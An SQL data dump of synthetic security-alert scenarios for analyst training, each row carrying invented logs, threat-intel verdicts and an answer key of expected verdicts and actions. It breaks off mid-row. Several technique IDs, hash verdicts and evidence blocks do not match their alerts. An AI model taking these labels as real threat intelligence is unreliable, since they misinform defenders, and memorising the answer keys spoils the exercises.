(324, 'Suspicious Network Traffic Detected', 'high', 'Firewall Logs', 'Unusual outbound traffic patterns detected from the enterprise firewall, possibly indicating unauthorized access attempts. The traffic originates from an internal IP and targets an external IP known for hosting malicious content. This activity suggests the initial access phase of an intrusion operation.', 'Initial Access', 'T1078: Valid Accounts', 1, 'Closed', NULL, '{\"timestamp\":\"2023-10-15T14:25:30Z\",\"firewall_id\":\"FW123456\",\"src_ip\":\"10.0.5.23\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"src_port\":44321,\"dst_port\":8080,\"action\":\"allowed\",\"username\":\"jdoe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"suspicious_payload.exe\",\"bytes_out\":10240,\"bytes_in\":2048}', '2026-01-02 20:29:44', '2026-03-09 03:01:58', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Username of the suspected compromised account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"suspicious\",\"details\":\"Hash related to a suspicious file payload.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"suspicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"File name indicative of malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(325, 'Malicious Firmware Update Detected', 'critical', 'Firewall Management Console', 'A rogue firmware update was installed on the firewall, allowing the attacker to execute code at a low level. Immediate action is required to mitigate potential threats.', 'Execution', 'T1496', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_type\":\"firmware_update\",\"source_ip\":\"185.143.223.91\",\"destination_ip\":\"192.168.1.1\",\"user\":\"admin\",\"firmware_version\":\"v5.3.2\",\"action\":\"update_executed\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"update_file\":\"firmware_update_v5.3.2.bin\",\"status\":\"completed\",\"message\":\"Firmware update executed successfully. No errors reported.\",\"suspicious_indicators\":{\"source_ip\":\"185.143.223.91\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}}', '2026-01-02 20:29:44', '2026-03-09 03:04:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.143.223.91\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous targeted attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal firewall device.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash belongs to a known malicious firmware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"firmware_update_v5.3.2.bin\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Repository\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(326, 'Persistence Mechanism Established', 'critical', 'Firmware Integrity Checks', 'The implant modifies the SPI flash memory, embedding itself to persist through reboots. This ensures the implant survives reboots and OS re-installations.', 'Persistence', 'T1105: Ingress Tool Transfer', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:22:08Z\",\"event_id\":\"FW-INT-CHK-2023\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.101\",\"detected_hash\":\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\",\"modified_firmware\":\"/dev/mtd0\",\"username\":\"admin\",\"alert_message\":\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\",\"severity\":\"Critical\",\"protocol\":\"SPI\",\"action_taken\":\"None\",\"firmware_version\":\"v1.4.3\"}', '2026-01-02 20:29:44', '2026-03-09 03:05:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known firmware backdoor.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/dev/mtd0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Critical firmware storage location.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Authentication Logs\",\"verdict\":\"clean\",\"details\":\"Standard administrative account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.920Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:22:08Z\\\",\\\"event_id\\\":\\\"FW-INT-CHK-2023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.101\\\",\\\"detected_hash\\\":\\\"3a5f2b3df5b9e3c6d6b8c2e9a1f4b8d7\\\",\\\"modified_firmware\\\":\\\"/dev/mtd0\\\",\\\"username\\\":\\\"admin\\\",\\\"alert_message\\\":\\\"Firmware integrity check failed. Unauthorized modification detected in SPI flash memory.\\\",\\\"severity\\\":\\\"Critical\\\",\\\"protocol\\\":\\\"SPI\\\",\\\"action_taken\\\":\\\"None\\\",\\\"firmware_version\\\":\\\"v1.4.3\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(327, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'The attacker uses the compromised firewall to probe internal network components, seeking further access.', 'Lateral Movement', 'T1021', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.1.1.5\",\"protocol\":\"TCP\",\"src_port\":443,\"dst_port\":3389,\"action\":\"allowed\",\"username\":\"compromised_user\",\"filename\":\"malicious_payload.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_id\":\"1001\",\"message\":\"Suspicious lateral movement detected from compromised firewall to internal systems.\"}', '2026-01-02 20:29:44', '2026-03-09 03:06:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with multiple attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a critical server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account showing unusual activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File identified as malware by multiple antivirus engines.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"SHA256 Lookup\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(328, 'Command and Control Channel Established', 'high', 'Network Intrusion Detection System', 'Encrypted traffic is observed between the compromised firewall and an external server, indicating active C2 communication.', 'C2 Communication', 'T1071.001', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-12T14:23:07Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"203.0.113.45\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TLS\",\"session_id\":\"3f4e1ab7c9d4\",\"encrypted_bytes\":1520,\"decrypted_bytes\":0,\"tls_version\":\"TLS 1.2\",\"cipher_suite\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"host\":\"compromised-firewall.local\",\"username\":\"jdoe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_id\":\"C2-2023-0005\",\"malware_family\":\"APT29\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\"},{\"type\":\"username\",\"value\":\"jdoe\"}]}', '2026-01-02 20:29:44', '2026-03-09 03:08:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 malware.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(329, 'Data Exfiltration Attempt Detected', 'high', 'Data Loss Prevention System', 'Data packets containing sensitive information are detected being sent to an external IP address.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:23:37Z\",\"event_id\":\"EXF-20231015-002\",\"internal_ip\":\"192.168.1.25\",\"external_ip\":\"203.0.113.45\",\"filename\":\"confidential_report.pdf\",\"user\":\"jdoe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"action\":\"blocked\",\"description\":\"Attempted data exfiltration detected and blocked by DLP system.\"}', '2026-01-02 20:29:44', '2026-03-09 03:09:29', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal inventory\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal inventory\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive information\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to suspicious activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:18.923Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:37Z\\\",\\\"event_id\\\":\\\"EXF-20231015-002\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"filename\\\":\\\"confidential_report.pdf\\\",\\\"user\\\":\\\"jdoe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"destination_port\\\":8080,\\\"protocol\\\":\\\"HTTP\\\",\\\"action\\\":\\\"blocked\\\",\\\"description\\\":\\\"Attempted data exfiltration detected and blocked by DLP system.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(330, 'Privilege Escalation Detected', 'high', 'Access Logs', 'Unauthorized attempts to escalate privileges within the network were detected, indicating that the attacker is attempting to gain elevated access.', 'Privilege Escalation', 'T1068', 1, 'Closed', 189, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"username\":\"john_doe\",\"attempted_privilege\":\"Administrator\",\"previous_privilege\":\"Standard User\",\"process\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"hash\":\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\",\"status\":\"Failed\",\"message\":\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\"}', '2026-01-02 20:29:44', '2026-03-09 03:10:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal host IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in previous suspicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 203.0.113.45.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:18.924Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"john_doe\\\",\\\"attempted_privilege\\\":\\\"Administrator\\\",\\\"previous_privilege\\\":\\\"Standard User\\\",\\\"process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"a3f5c3d4b8e5f6a7d9e8c1b7a9f0c8b7\\\",\\\"status\\\":\\\"Failed\\\",\\\"message\\\":\\\"Privilege escalation attempt detected for user john_doe from IP 